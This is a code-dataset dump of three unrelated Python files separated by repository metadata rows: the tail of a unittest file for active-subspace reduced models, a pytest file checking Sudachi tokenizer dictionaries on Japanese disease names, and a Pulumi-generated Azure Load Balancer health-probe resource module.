X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_interface(self.quad_fun, avdim=1)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_bnd_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(100,3))
f = np.zeros((100,1))
df = np.zeros((100,3))
for i in range(100):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_interface(self.quad_fun, avdim=1)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_ubnd_2d_int(self):
np.random.seed(42)
X = np.random.normal(size=(100,3))
f = np.zeros((100,1))
df = np.zeros((100,3))
for i in range(100):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_interface(self.quad_fun, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_bnd_2d_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_interface(self.quad_fun, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
if __name__ == '__main__':
unittest.main()
| 31.985366
| 86
| 0.549337
| 962
| 6,557
| 3.642412
| 0.097713
| 0.054795
| 0.041096
| 0.045662
| 0.832477
| 0.829623
| 0.829623
| 0.818779
| 0.818779
| 0.818779
| 0
| 0.120396
| 0.291902
| 6,557
| 204
| 87
| 32.142157
| 0.634288
| 0
| 0
| 0.768293
| 0
| 0
| 0.00122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.054878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94ef5634d68ace2f064febd4032e1518892aa6c7
| 3,471
|
py
|
Python
|
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | 3
|
2021-04-09T01:52:55.000Z
|
2022-03-18T02:12:42.000Z
|
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | null | null | null |
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | null | null | null |
from sudachipy import tokenizer
from sudachipy import dictionary
import pytest
@pytest.fixture(scope="module")
def tokenizer_all():
return dictionary.Dictionary(config_path="config/sudachi_all.json").create()
@pytest.fixture(scope="module")
def tokenizer_sabc():
return dictionary.Dictionary(config_path="config/sudachi_sabc.json").create()
def test_tokenize_disease_name_normal(tokenizer_all, tokenizer_sabc):
text = "疼痛"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_alphabet_number_zen(tokenizer_all, tokenizer_sabc):
text = "E2A−PBX1陽性Bリンパ芽球性白血病"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_alphabet_number_han(tokenizer_all, tokenizer_sabc):
text = "e2a−pbx1陽性bリンパ芽球性白血病"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_phrase(tokenizer_all, tokenizer_sabc):
text = "lsd使用による急性精神・行動障害"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_punctuation(tokenizer_all, tokenizer_sabc):
text = "中咽頭癌、病期不明"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_punctuation_comma(tokenizer_all, tokenizer_sabc):
text = "熱帯熱マラリア、赤痢"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
def test_tokenize_disease_name_punctuation_comma_before_fix(tokenizer_all, tokenizer_sabc):
text = "熱帯熱マラリア,赤痢"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "熱帯熱マラリア"
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "熱帯熱マラリア"
def test_tokenize_disease_name_confidence_D(tokenizer_all, tokenizer_sabc):
text = "脊椎腫瘤"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "脊椎腫瘤"
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "脊椎" # 脊椎 腫瘤
def test_tokenize_disease_name_confidence_F(tokenizer_all, tokenizer_sabc):
text = "不感蒸散分"
assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "不感蒸散分"
assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "不感" # 不感 蒸散 分
def test_tokenize_normal_text(tokenizer_all, tokenizer_sabc):
text = "吾輩は猫である"
assert [t.surface() for t in tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)] == [
"吾輩",
"は",
"猫",
"で",
"ある",
]
assert [t.surface() for t in tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)] == [
"吾輩",
"は",
"猫",
"で",
"ある",
]
| 39.896552
| 105
| 0.741861
| 441
| 3,471
| 5.630385
| 0.154195
| 0.10149
| 0.16915
| 0.241643
| 0.910592
| 0.830044
| 0.77205
| 0.716472
| 0.706404
| 0.700765
| 0
| 0.007282
| 0.129646
| 3,471
| 86
| 106
| 40.360465
| 0.813638
| 0.003745
| 0
| 0.393443
| 0
| 0
| 0.059045
| 0.013603
| 0
| 0
| 0
| 0
| 0.327869
| 1
| 0.196721
| false
| 0
| 0.04918
| 0.032787
| 0.278689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94f7efe9bd0b70662e2d13b2bee7d69c97e7dafb
| 28,682
|
py
|
Python
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProbeArgs', 'Probe']
@pulumi.input_type
class ProbeArgs:
def __init__(__self__, *,
loadbalancer_id: pulumi.Input[str],
port: pulumi.Input[int],
resource_group_name: pulumi.Input[str],
interval_in_seconds: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
number_of_probes: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
request_path: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Probe resource.
:param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
:param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
:param pulumi.Input[int] interval_in_seconds: The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
:param pulumi.Input[str] name: Specifies the name of the Probe.
:param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
:param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
:param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
"""
pulumi.set(__self__, "loadbalancer_id", loadbalancer_id)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if interval_in_seconds is not None:
pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
if name is not None:
pulumi.set(__self__, "name", name)
if number_of_probes is not None:
pulumi.set(__self__, "number_of_probes", number_of_probes)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if request_path is not None:
pulumi.set(__self__, "request_path", request_path)
@property
@pulumi.getter(name="loadbalancerId")
def loadbalancer_id(self) -> pulumi.Input[str]:
"""
The ID of the LoadBalancer in which to create the NAT Rule.
"""
return pulumi.get(self, "loadbalancer_id")
@loadbalancer_id.setter
def loadbalancer_id(self, value: pulumi.Input[str]):
pulumi.set(self, "loadbalancer_id", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the resource.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="intervalInSeconds")
def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
"""
return pulumi.get(self, "interval_in_seconds")
@interval_in_seconds.setter
def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_seconds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Probe.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="numberOfProbes")
def number_of_probes(self) -> Optional[pulumi.Input[int]]:
"""
The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
"""
return pulumi.get(self, "number_of_probes")
@number_of_probes.setter
def number_of_probes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_probes", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> Optional[pulumi.Input[str]]:
"""
The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
"""
return pulumi.get(self, "request_path")
@request_path.setter
def request_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_path", value)
@pulumi.input_type
class _ProbeState:
def __init__(__self__, *,
interval_in_seconds: Optional[pulumi.Input[int]] = None,
load_balancer_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
loadbalancer_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
number_of_probes: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
request_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Probe resources.
:param pulumi.Input[int] interval_in_seconds: The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
:param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
:param pulumi.Input[str] name: Specifies the name of the Probe.
:param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
:param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
:param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
:param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
"""
if interval_in_seconds is not None:
pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
if load_balancer_rules is not None:
pulumi.set(__self__, "load_balancer_rules", load_balancer_rules)
if loadbalancer_id is not None:
pulumi.set(__self__, "loadbalancer_id", loadbalancer_id)
if name is not None:
pulumi.set(__self__, "name", name)
if number_of_probes is not None:
pulumi.set(__self__, "number_of_probes", number_of_probes)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if request_path is not None:
pulumi.set(__self__, "request_path", request_path)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter(name="intervalInSeconds")
def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
"""
return pulumi.get(self, "interval_in_seconds")
@interval_in_seconds.setter
def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_seconds", value)
@property
@pulumi.getter(name="loadBalancerRules")
def load_balancer_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "load_balancer_rules")
@load_balancer_rules.setter
def load_balancer_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_rules", value)
@property
@pulumi.getter(name="loadbalancerId")
def loadbalancer_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the LoadBalancer in which to create the NAT Rule.
"""
return pulumi.get(self, "loadbalancer_id")
@loadbalancer_id.setter
def loadbalancer_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "loadbalancer_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Probe.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="numberOfProbes")
def number_of_probes(self) -> Optional[pulumi.Input[int]]:
"""
The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
"""
return pulumi.get(self, "number_of_probes")
@number_of_probes.setter
def number_of_probes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_probes", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> Optional[pulumi.Input[str]]:
"""
The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
"""
return pulumi.get(self, "request_path")
@request_path.setter
def request_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the resource.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
class Probe(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
interval_in_seconds: Optional[pulumi.Input[int]] = None,
loadbalancer_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
number_of_probes: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
request_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a LoadBalancer Probe Resource.
> **NOTE** When using this resource, the Load Balancer needs to have a FrontEnd IP Configuration Attached
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_public_ip = azure.network.PublicIp("examplePublicIp",
location="West US",
resource_group_name=example_resource_group.name,
allocation_method="Static")
example_load_balancer = azure.lb.LoadBalancer("exampleLoadBalancer",
location="West US",
resource_group_name=example_resource_group.name,
frontend_ip_configurations=[azure.lb.LoadBalancerFrontendIpConfigurationArgs(
name="PublicIPAddress",
public_ip_address_id=example_public_ip.id,
)])
example_probe = azure.lb.Probe("exampleProbe",
resource_group_name=example_resource_group.name,
loadbalancer_id=example_load_balancer.id,
port=22)
```
## Import
Load Balancer Probes can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:lb/probe:Probe example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/loadBalancers/lb1/probes/probe1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] interval_in_seconds: The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
:param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
:param pulumi.Input[str] name: Specifies the name of the Probe.
:param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
:param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
:param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
:param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProbeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a LoadBalancer Probe Resource.
> **NOTE** When using this resource, the Load Balancer needs to have a FrontEnd IP Configuration Attached
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_public_ip = azure.network.PublicIp("examplePublicIp",
location="West US",
resource_group_name=example_resource_group.name,
allocation_method="Static")
example_load_balancer = azure.lb.LoadBalancer("exampleLoadBalancer",
location="West US",
resource_group_name=example_resource_group.name,
frontend_ip_configurations=[azure.lb.LoadBalancerFrontendIpConfigurationArgs(
name="PublicIPAddress",
public_ip_address_id=example_public_ip.id,
)])
example_probe = azure.lb.Probe("exampleProbe",
resource_group_name=example_resource_group.name,
loadbalancer_id=example_load_balancer.id,
port=22)
```
## Import
Load Balancer Probes can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:lb/probe:Probe example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/loadBalancers/lb1/probes/probe1
```
:param str resource_name: The name of the resource.
:param ProbeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProbeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
interval_in_seconds: Optional[pulumi.Input[int]] = None,
loadbalancer_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
number_of_probes: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
request_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProbeArgs.__new__(ProbeArgs)
__props__.__dict__["interval_in_seconds"] = interval_in_seconds
if loadbalancer_id is None and not opts.urn:
raise TypeError("Missing required property 'loadbalancer_id'")
__props__.__dict__["loadbalancer_id"] = loadbalancer_id
__props__.__dict__["name"] = name
__props__.__dict__["number_of_probes"] = number_of_probes
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["request_path"] = request_path
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["load_balancer_rules"] = None
super(Probe, __self__).__init__(
'azure:lb/probe:Probe',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
interval_in_seconds: Optional[pulumi.Input[int]] = None,
load_balancer_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
loadbalancer_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
number_of_probes: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
request_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Probe':
"""
Get an existing Probe resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] interval_in_seconds: The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
:param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
:param pulumi.Input[str] name: Specifies the name of the Probe.
:param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
:param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
:param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
:param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProbeState.__new__(_ProbeState)
__props__.__dict__["interval_in_seconds"] = interval_in_seconds
__props__.__dict__["load_balancer_rules"] = load_balancer_rules
__props__.__dict__["loadbalancer_id"] = loadbalancer_id
__props__.__dict__["name"] = name
__props__.__dict__["number_of_probes"] = number_of_probes
__props__.__dict__["port"] = port
__props__.__dict__["protocol"] = protocol
__props__.__dict__["request_path"] = request_path
__props__.__dict__["resource_group_name"] = resource_group_name
return Probe(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="intervalInSeconds")
def interval_in_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The interval, in seconds between probes to the backend endpoint for health status. The default value is 15, the minimum value is 5.
"""
return pulumi.get(self, "interval_in_seconds")
@property
@pulumi.getter(name="loadBalancerRules")
def load_balancer_rules(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "load_balancer_rules")
@property
@pulumi.getter(name="loadbalancerId")
def loadbalancer_id(self) -> pulumi.Output[str]:
"""
The ID of the LoadBalancer in which to create the NAT Rule.
"""
return pulumi.get(self, "loadbalancer_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Probe.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="numberOfProbes")
def number_of_probes(self) -> pulumi.Output[Optional[int]]:
"""
The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds value must be greater or equal to 10.Endpoints are returned to rotation when at least one probe is successful.
"""
return pulumi.get(self, "number_of_probes")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> pulumi.Output[Optional[str]]:
"""
The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
"""
return pulumi.get(self, "request_path")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the resource.
"""
return pulumi.get(self, "resource_group_name")
| 50.496479
| 327
| 0.67171
| 3,648
| 28,682
| 5.089364
| 0.068531
| 0.068728
| 0.053539
| 0.046214
| 0.911936
| 0.896747
| 0.882904
| 0.863676
| 0.845362
| 0.830604
| 0
| 0.008239
| 0.238303
| 28,682
| 567
| 328
| 50.585538
| 0.84158
| 0.429956
| 0
| 0.731392
| 1
| 0
| 0.104431
| 0.001408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161812
| false
| 0.003236
| 0.016181
| 0.006472
| 0.275081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
